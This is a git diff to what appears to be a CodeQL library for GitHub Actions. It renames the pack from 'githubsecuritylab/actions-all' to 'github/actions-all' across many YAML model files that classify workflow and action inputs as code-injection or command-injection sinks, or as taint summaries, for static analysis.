@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["speedb-io/speedb/.github/workflows/build_ubuntu_arm.yml", "*", "input.verSion", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/spring-cloud_spring-cloud-dataflow.model.yml b/ql/lib/ext/generated/reusable-workflows/spring-cloud_spring-cloud-dataflow.model.yml index 8a3132d52582..2868aecd064e 100644 --- a/ql/lib/ext/generated/reusable-workflows/spring-cloud_spring-cloud-dataflow.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/spring-cloud_spring-cloud-dataflow.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["spring-cloud/spring-cloud-dataflow/.github/workflows/build-images.yml", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/sqlfluff_sqlfluff.model.yml b/ql/lib/ext/generated/reusable-workflows/sqlfluff_sqlfluff.model.yml index 9a669c8c009a..0aa2d1c596c7 100644 --- a/ql/lib/ext/generated/reusable-workflows/sqlfluff_sqlfluff.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/sqlfluff_sqlfluff.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["sqlfluff/sqlfluff/.github/workflows/ci-test-python.yml", "*", "input.marks", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/stdlib-js_stdlib.model.yml b/ql/lib/ext/generated/reusable-workflows/stdlib-js_stdlib.model.yml index 0ecb817822c0..02fe1b2055f6 100644 --- a/ql/lib/ext/generated/reusable-workflows/stdlib-js_stdlib.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/stdlib-js_stdlib.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["stdlib-js/stdlib/.github/workflows/update_pr_copyright_years.yml", "*", "input.pull_request_number", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/stereokit_stereokit.model.yml b/ql/lib/ext/generated/reusable-workflows/stereokit_stereokit.model.yml index e4590eeec8b6..9f6401ec03e9 100644 --- a/ql/lib/ext/generated/reusable-workflows/stereokit_stereokit.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/stereokit_stereokit.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["stereokit/stereokit/.github/workflows/build.yml", "*", "input.patch", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/streetsidesoftware_cspell.model.yml b/ql/lib/ext/generated/reusable-workflows/streetsidesoftware_cspell.model.yml index ea0ddad06978..373b507f2f30 100644 --- a/ql/lib/ext/generated/reusable-workflows/streetsidesoftware_cspell.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/streetsidesoftware_cspell.model.yml @@ -1,11 +1,11 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["streetsidesoftware/cspell/.github/workflows/reuseable-pr-from-artifact.yml", "*", "input.patch_path", "code-injection", "generated"] - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["streetsidesoftware/cspell/.github/workflows/reuseable-load-integrations-repo-list.yml", "*", "input.ref", "output.ref", "taint", "manual"] diff --git a/ql/lib/ext/generated/reusable-workflows/supabase_auth.model.yml b/ql/lib/ext/generated/reusable-workflows/supabase_auth.model.yml index 9352f766e82d..9b68b660586b 100644 
--- a/ql/lib/ext/generated/reusable-workflows/supabase_auth.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/supabase_auth.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["supabase/auth/.github/workflows/publish.yml", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/supabase_cli.model.yml b/ql/lib/ext/generated/reusable-workflows/supabase_cli.model.yml index d436644f4acd..ddce9773100d 100644 --- a/ql/lib/ext/generated/reusable-workflows/supabase_cli.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/supabase_cli.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["supabase/cli/.github/workflows/mirror-image.yml", "*", "input.image", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/tencent_hippy.model.yml b/ql/lib/ext/generated/reusable-workflows/tencent_hippy.model.yml index c6c01abca904..3aa599e00d70 100644 --- a/ql/lib/ext/generated/reusable-workflows/tencent_hippy.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/tencent_hippy.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["tencent/hippy/.github/workflows/reuse_get_workflow_output.yml", "*", "input.workflow_run", "code-injection", "generated"] 
@@ -8,7 +8,7 @@ extensions: - ["tencent/hippy/.github/workflows/reuse_approve_checks_run.yml", "*", "input.pull_request_head_sha", "code-injection", "generated"] - ["tencent/hippy/.github/workflows/reuse_approve_checks_run.yml", "*", "input.pull_request_number", "code-injection", "generated"] - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["tencent/hippy/.github/workflows/reuse_approve_checks_run.yml", "*", "input.pull_request_head_sha", "output.pull_request_head_sha", "taint", "manual"] diff --git a/ql/lib/ext/generated/reusable-workflows/tgstation_tgstation.model.yml b/ql/lib/ext/generated/reusable-workflows/tgstation_tgstation.model.yml index 8a9f76e7e52d..4ff3377e6ebd 100644 --- a/ql/lib/ext/generated/reusable-workflows/tgstation_tgstation.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/tgstation_tgstation.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["tgstation/tgstation/.github/workflows/run_integration_tests.yml", "*", "input.map", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/thesofproject_sof.model.yml b/ql/lib/ext/generated/reusable-workflows/thesofproject_sof.model.yml index 8b3cfebc67b9..577ffa78d821 100644 --- a/ql/lib/ext/generated/reusable-workflows/thesofproject_sof.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/thesofproject_sof.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["thesofproject/sof/.github/workflows/ipc_fuzzer.yml", "*", "input.fuzzing_duration_s", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/tiann_kernelsu.model.yml b/ql/lib/ext/generated/reusable-workflows/tiann_kernelsu.model.yml index 9add4859f35a..99ff06a4aee3 100644 
--- a/ql/lib/ext/generated/reusable-workflows/tiann_kernelsu.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/tiann_kernelsu.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["tiann/kernelsu/.github/workflows/ksud.yml", "*", "input.target", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/tiledb-inc_tiledb.model.yml b/ql/lib/ext/generated/reusable-workflows/tiledb-inc_tiledb.model.yml index efc8097b963f..5241bc1bcb1e 100644 --- a/ql/lib/ext/generated/reusable-workflows/tiledb-inc_tiledb.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/tiledb-inc_tiledb.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["tiledb-inc/tiledb/.github/workflows/ci-linux_mac.yml", "*", "input.asan", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/toeverything_affine.model.yml b/ql/lib/ext/generated/reusable-workflows/toeverything_affine.model.yml index 6a305522cfb4..66221185cbdb 100644 --- a/ql/lib/ext/generated/reusable-workflows/toeverything_affine.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/toeverything_affine.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["toeverything/affine/.github/workflows/build-server-image.yml", "*", "input.flavor", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/tracel-ai_burn.model.yml b/ql/lib/ext/generated/reusable-workflows/tracel-ai_burn.model.yml index 441325c76a5f..eb5207528d4f 100644 --- a/ql/lib/ext/generated/reusable-workflows/tracel-ai_burn.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/tracel-ai_burn.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["tracel-ai/burn/.github/workflows/publish-template.yml", "*", "input.crate", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/tribler_tribler.model.yml b/ql/lib/ext/generated/reusable-workflows/tribler_tribler.model.yml index 5f0831afc073..1337b0e76ec4 100644 --- a/ql/lib/ext/generated/reusable-workflows/tribler_tribler.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/tribler_tribler.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["tribler/tribler/.github/workflows/pytest_custom_ipv8.yml", "*", "input.ipv8-git-ref", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/ubisoft_sharpmake.model.yml b/ql/lib/ext/generated/reusable-workflows/ubisoft_sharpmake.model.yml index afd7aabc1fce..1d8b8f0e9f1b 100644 --- a/ql/lib/ext/generated/reusable-workflows/ubisoft_sharpmake.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/ubisoft_sharpmake.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["ubisoft/sharpmake/.github/workflows/build.yml", "*", "input.framework", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/unity-technologies_ml-agents.model.yml b/ql/lib/ext/generated/reusable-workflows/unity-technologies_ml-agents.model.yml index 49e556f585f6..4eaa610a3a2b 100644 --- a/ql/lib/ext/generated/reusable-workflows/unity-technologies_ml-agents.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/unity-technologies_ml-agents.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["unity-technologies/ml-agents/.github/workflows/pytest.yml", "*", "input.pytest_markers", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/urbit_urbit.model.yml b/ql/lib/ext/generated/reusable-workflows/urbit_urbit.model.yml index 24585aa50ed0..a62139e12c47 100644 --- a/ql/lib/ext/generated/reusable-workflows/urbit_urbit.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/urbit_urbit.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["urbit/urbit/.github/workflows/shared.yml", "*", "input.pace", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/uyuni-project_uyuni.model.yml b/ql/lib/ext/generated/reusable-workflows/uyuni-project_uyuni.model.yml index afc7af28f9b4..2f3f85fe424c 100644 --- a/ql/lib/ext/generated/reusable-workflows/uyuni-project_uyuni.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/uyuni-project_uyuni.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["uyuni-project/uyuni/.github/workflows/acceptance_tests_common.yml", "*", "input.server_id", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/vert-x3_vertx-hazelcast.model.yml b/ql/lib/ext/generated/reusable-workflows/vert-x3_vertx-hazelcast.model.yml index 5b3d91a8a7ba..f39a027eda7c 100644 --- a/ql/lib/ext/generated/reusable-workflows/vert-x3_vertx-hazelcast.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/vert-x3_vertx-hazelcast.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["vert-x3/vertx-hazelcast/.github/workflows/it.yml", "*", "input.hz", "code-injection", "generated"]
diff --git a/ql/lib/ext/generated/reusable-workflows/vkcom_vkui.model.yml b/ql/lib/ext/generated/reusable-workflows/vkcom_vkui.model.yml
index b43253eb619a..5a0b692e4e18 100644
--- a/ql/lib/ext/generated/reusable-workflows/vkcom_vkui.model.yml
+++ b/ql/lib/ext/generated/reusable-workflows/vkcom_vkui.model.yml
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["vkcom/vkui/.github/workflows/reusable_workflow_test.yml", "*", "input.workspace", "code-injection", "generated"] \ No newline at end of file
diff --git a/ql/lib/ext/generated/reusable-workflows/walletconnect_web3modal.model.yml b/ql/lib/ext/generated/reusable-workflows/walletconnect_web3modal.model.yml
index 89559cf57e3f..ae902cb95ab6 100644
--- a/ql/lib/ext/generated/reusable-workflows/walletconnect_web3modal.model.yml
+++ b/ql/lib/ext/generated/reusable-workflows/walletconnect_web3modal.model.yml
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["walletconnect/web3modal/.github/workflows/ui_tests.yml", "*", "input.command", "code-injection", "generated"] \ No newline at end of file
diff --git a/ql/lib/ext/generated/reusable-workflows/warzone2100_warzone2100.model.yml b/ql/lib/ext/generated/reusable-workflows/warzone2100_warzone2100.model.yml
index 6292841e56ad..78379dd7796c 100644
--- a/ql/lib/ext/generated/reusable-workflows/warzone2100_warzone2100.model.yml
+++ b/ql/lib/ext/generated/reusable-workflows/warzone2100_warzone2100.model.yml
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["warzone2100/warzone2100/.github/workflows/publish_web_build.yml", "*", "input.architecture", "code-injection", "generated"] \ No newline at end of file
diff --git a/ql/lib/ext/generated/reusable-workflows/wasmedge_wasmedge.model.yml b/ql/lib/ext/generated/reusable-workflows/wasmedge_wasmedge.model.yml
index 9f98fd51139d..0eeed9a1f17e 100644
--- a/ql/lib/ext/generated/reusable-workflows/wasmedge_wasmedge.model.yml
+++ b/ql/lib/ext/generated/reusable-workflows/wasmedge_wasmedge.model.yml
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["wasmedge/wasmedge/.github/workflows/reusable-create-source-tarball.yml", "*", "input.version", "code-injection", "generated"]
diff --git a/ql/lib/ext/generated/reusable-workflows/web-infra-dev_rspack.model.yml b/ql/lib/ext/generated/reusable-workflows/web-infra-dev_rspack.model.yml
index e04605511b89..3ab501e1b1f3 100644
--- a/ql/lib/ext/generated/reusable-workflows/web-infra-dev_rspack.model.yml
+++ b/ql/lib/ext/generated/reusable-workflows/web-infra-dev_rspack.model.yml
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["web-infra-dev/rspack/.github/workflows/reusable-build.yml", "*", "input.profile", "code-injection", "generated"]
diff --git a/ql/lib/ext/generated/reusable-workflows/werf_werf.model.yml b/ql/lib/ext/generated/reusable-workflows/werf_werf.model.yml
index a77181e6c4eb..caa0ee6d7cb1 100644
--- a/ql/lib/ext/generated/reusable-workflows/werf_werf.model.yml
+++ b/ql/lib/ext/generated/reusable-workflows/werf_werf.model.yml
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["werf/werf/.github/workflows/_test_unit.yml", "*", "input.excludePackages", "code-injection", "generated"]
diff --git a/ql/lib/ext/generated/reusable-workflows/widdix_aws-cf-templates.model.yml b/ql/lib/ext/generated/reusable-workflows/widdix_aws-cf-templates.model.yml
index 6c90e29a43bf..b660b0bc4ec3 100644
--- a/ql/lib/ext/generated/reusable-workflows/widdix_aws-cf-templates.model.yml
+++ b/ql/lib/ext/generated/reusable-workflows/widdix_aws-cf-templates.model.yml
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["widdix/aws-cf-templates/.github/workflows/acceptance-test-run.yml", "*", "input.tests", "code-injection", "generated"] \ No newline at end of file
diff --git a/ql/lib/ext/generated/reusable-workflows/wildfly_wildfly.model.yml b/ql/lib/ext/generated/reusable-workflows/wildfly_wildfly.model.yml
index 6bacbc181daa..0fe5470bb11a 100644
--- a/ql/lib/ext/generated/reusable-workflows/wildfly_wildfly.model.yml
+++ b/ql/lib/ext/generated/reusable-workflows/wildfly_wildfly.model.yml
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["wildfly/wildfly/.github/workflows/shared-wildfly-build-and-test.yml", "*", "input.build-arguments", "code-injection", "generated"]
diff --git a/ql/lib/ext/generated/reusable-workflows/yt-dlp_yt-dlp.model.yml b/ql/lib/ext/generated/reusable-workflows/yt-dlp_yt-dlp.model.yml
index 83d438d4e3d4..a9cd5759cf2a 100644
--- a/ql/lib/ext/generated/reusable-workflows/yt-dlp_yt-dlp.model.yml
+++ b/ql/lib/ext/generated/reusable-workflows/yt-dlp_yt-dlp.model.yml
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["yt-dlp/yt-dlp/.github/workflows/release.yml", "*", "input.target", "code-injection", "generated"]
diff --git a/ql/lib/ext/generated/reusable-workflows/zenml-io_zenml.model.yml b/ql/lib/ext/generated/reusable-workflows/zenml-io_zenml.model.yml
index 703a766cb4cb..5b0dc5da53d2 100644
--- a/ql/lib/ext/generated/reusable-workflows/zenml-io_zenml.model.yml
+++ b/ql/lib/ext/generated/reusable-workflows/zenml-io_zenml.model.yml
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["zenml-io/zenml/.github/workflows/publish_docker_image.yml", "*", "input.config_file", "code-injection", "generated"]
diff --git a/ql/lib/ext/generated/reusable-workflows/zephyrproject-rtos_zephyr.model.yml b/ql/lib/ext/generated/reusable-workflows/zephyrproject-rtos_zephyr.model.yml
index ecb4c809efe4..c90d1ac8afbd 100644
--- a/ql/lib/ext/generated/reusable-workflows/zephyrproject-rtos_zephyr.model.yml
+++ b/ql/lib/ext/generated/reusable-workflows/zephyrproject-rtos_zephyr.model.yml
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["zephyrproject-rtos/zephyr/.github/workflows/ready-to-merge.yml", "*", "input.needs_context", "code-injection", "generated"] \ No newline at end of file
diff --git a/ql/lib/ext/generated/reusable-workflows/zitadel_zitadel.model.yml b/ql/lib/ext/generated/reusable-workflows/zitadel_zitadel.model.yml
index 9b02577be7d3..8d68efb9247e 100644
--- a/ql/lib/ext/generated/reusable-workflows/zitadel_zitadel.model.yml
+++ b/ql/lib/ext/generated/reusable-workflows/zitadel_zitadel.model.yml
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["zitadel/zitadel/.github/workflows/release.yml", "*", "input.image_name", "code-injection", "generated"]
@@ -8,7 +8,7 @@ extensions: - ["zitadel/zitadel/.github/workflows/container.yml", "*", "input.build_image_name", "code-injection", "generated"] - ["zitadel/zitadel/.github/workflows/compile.yml", "*", "input.version", "code-injection", "generated"] - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["zitadel/zitadel/.github/workflows/container.yml", "*", "input.build_image_name", "output.build_image", "taint", "manual"]
diff --git a/ql/lib/ext/getsentry_action-release.model.yml b/ql/lib/ext/getsentry_action-release.model.yml
index 1ffc3df1c815..cb127c7ff467 100644
--- a/ql/lib/ext/getsentry_action-release.model.yml
+++ b/ql/lib/ext/getsentry_action-release.model.yml
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["getsentry/action-release", "*", "input.version", "output.version", "taint", "manual"]
diff --git a/ql/lib/ext/github_codeql-action.model.yml b/ql/lib/ext/github_codeql-action.model.yml
index 53ed1840b0a1..79936a515206 100644
--- a/ql/lib/ext/github_codeql-action.model.yml
+++ b/ql/lib/ext/github_codeql-action.model.yml
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["github/codeql-action", "*", "input.output", "output.sarif-output", "taint", "manual"]
diff --git a/ql/lib/ext/go-semantic-release_action.model.yml b/ql/lib/ext/go-semantic-release_action.model.yml
index 17d2ed2e4735..9bc26169b27b 100644
--- a/ql/lib/ext/go-semantic-release_action.model.yml
+++ b/ql/lib/ext/go-semantic-release_action.model.yml
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["go-semantic-release/action", "*", "input.bin", "command-injection", "manual"]
diff --git a/ql/lib/ext/golangci_golangci-lint-action.model.yml b/ql/lib/ext/golangci_golangci-lint-action.model.yml
index 68c2552c3505..8aa19f944523 100644
--- a/ql/lib/ext/golangci_golangci-lint-action.model.yml
+++ b/ql/lib/ext/golangci_golangci-lint-action.model.yml
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["golangci/golangci-lint-action", "*", "input.version", "command-injection", "manual"]
diff --git a/ql/lib/ext/gonuit_heroku-docker-deploy.model.yml b/ql/lib/ext/gonuit_heroku-docker-deploy.model.yml
index 977f6b98ae4b..dc86b19a69b1 100644
--- a/ql/lib/ext/gonuit_heroku-docker-deploy.model.yml
+++ b/ql/lib/ext/gonuit_heroku-docker-deploy.model.yml
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["gonuit/heroku-docker-deploy", "*", "input.email", "command-injection", "manual"]
diff --git a/ql/lib/ext/goreleaser_goreleaser-action.model.yml b/ql/lib/ext/goreleaser_goreleaser-action.model.yml
index 616f7fdb9ca8..bc9f2aad14c1 100644
--- a/ql/lib/ext/goreleaser_goreleaser-action.model.yml
+++ b/ql/lib/ext/goreleaser_goreleaser-action.model.yml
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["goreleaser/goreleaser-action", "*", "input.args", "command-injection", "manual"]
diff --git a/ql/lib/ext/gr2m_create-or-update-pull-request-action.model.yml b/ql/lib/ext/gr2m_create-or-update-pull-request-action.model.yml
index e4961ae5ed63..c3604795c256 100644
--- a/ql/lib/ext/gr2m_create-or-update-pull-request-action.model.yml
+++ b/ql/lib/ext/gr2m_create-or-update-pull-request-action.model.yml
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["gr2m/create-or-update-pull-request-action", "*", "input.branch", "command-injection", "manual"]
diff --git a/ql/lib/ext/gradle_gradle-build-action.model.yml b/ql/lib/ext/gradle_gradle-build-action.model.yml
index 19cce83c691d..dfcc204c2bac 100644
--- a/ql/lib/ext/gradle_gradle-build-action.model.yml
+++ b/ql/lib/ext/gradle_gradle-build-action.model.yml
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["gradle/gradle-build-action", "*", "input.cache-encryption-key", "env.GRADLE_ENCRYPTION_KEY", "taint", "manual"]
diff --git a/ql/lib/ext/haya14busa_action-cond.model.yml b/ql/lib/ext/haya14busa_action-cond.model.yml
index f838eeed0eb8..c8d5e822c02c 100644
--- a/ql/lib/ext/haya14busa_action-cond.model.yml
+++ b/ql/lib/ext/haya14busa_action-cond.model.yml
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["haya14busa/action-cond", "*", "input.if_true", "output.value", "taint", "manual"]
diff --git a/ql/lib/ext/hexlet_project-action.model.yml b/ql/lib/ext/hexlet_project-action.model.yml
index 48e5b05128f8..5c7ec5f957fe 100644
--- a/ql/lib/ext/hexlet_project-action.model.yml
+++ b/ql/lib/ext/hexlet_project-action.model.yml
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["hexlet/project-action", "*", "input.mount-path", "env.PWD", "taint", "manual"]
diff --git a/ql/lib/ext/ilammy_msvc-dev-cmd.model.yml b/ql/lib/ext/ilammy_msvc-dev-cmd.model.yml
index 448997b3136e..5384571801c6 100644
--- a/ql/lib/ext/ilammy_msvc-dev-cmd.model.yml
+++ b/ql/lib/ext/ilammy_msvc-dev-cmd.model.yml
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["ilammy/msvc-dev-cmd", "*", "input.vsversion", "command-injection", "manual"]
diff --git a/ql/lib/ext/ilammy_setup-nasm.model.yml b/ql/lib/ext/ilammy_setup-nasm.model.yml
index 13af446f37d1..ba5de742701c 100644
--- a/ql/lib/ext/ilammy_setup-nasm.model.yml
+++ b/ql/lib/ext/ilammy_setup-nasm.model.yml
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["ilammy/setup-nasm", "*", "input.version", "command-injection", "manual"]
diff --git a/ql/lib/ext/imjohnbo_issue-bot.model.yml b/ql/lib/ext/imjohnbo_issue-bot.model.yml
index 39e1c9ef6240..ce0fb5734932 100644
--- a/ql/lib/ext/imjohnbo_issue-bot.model.yml
+++ b/ql/lib/ext/imjohnbo_issue-bot.model.yml
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["imjohnbo/issue-bot", "*", "input.body", "code-injection", "manual"]
diff --git a/ql/lib/ext/iterative_setup-cml.model.yml b/ql/lib/ext/iterative_setup-cml.model.yml
index a442ed5cd531..8f53dfeb118a 100644
--- a/ql/lib/ext/iterative_setup-cml.model.yml
+++ b/ql/lib/ext/iterative_setup-cml.model.yml
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["iterative/setup-cml", "*", "input.version", "command-injection", "manual"]
diff --git a/ql/lib/ext/iterative_setup-dvc.model.yml b/ql/lib/ext/iterative_setup-dvc.model.yml
index a22fce01c453..6d7d368c7810 100644
--- a/ql/lib/ext/iterative_setup-dvc.model.yml
+++ b/ql/lib/ext/iterative_setup-dvc.model.yml
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["iterative/setup-dvc", "*", "input.version", "command-injection", "manual"]
diff --git a/ql/lib/ext/jamesives_github-pages-deploy-action.model.yml b/ql/lib/ext/jamesives_github-pages-deploy-action.model.yml
index 74a5c7d592c7..9b0f078d8742 100644
--- a/ql/lib/ext/jamesives_github-pages-deploy-action.model.yml
+++ b/ql/lib/ext/jamesives_github-pages-deploy-action.model.yml
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["jamesives/github-pages-deploy-action", "*", "input.branch", "command-injection", "manual"]
diff --git a/ql/lib/ext/jitterbit_get-changed-files.model.yml b/ql/lib/ext/jitterbit_get-changed-files.model.yml
index e78dfb3b073d..dabec4e8d215 100644
--- a/ql/lib/ext/jitterbit_get-changed-files.model.yml
+++ b/ql/lib/ext/jitterbit_get-changed-files.model.yml
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSourceModel data: - ["jitterbit/get-changed-files", "*", "output.all", "filename", "manual"]
diff --git a/ql/lib/ext/johnnymorganz_stylua-action.model.yml b/ql/lib/ext/johnnymorganz_stylua-action.model.yml
index 29dac5cffeaa..2db040a0709a 100644
--- a/ql/lib/ext/johnnymorganz_stylua-action.model.yml
+++ b/ql/lib/ext/johnnymorganz_stylua-action.model.yml
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["johnnymorganz/stylua-action", "*", "input.args", "command-injection", "manual"]
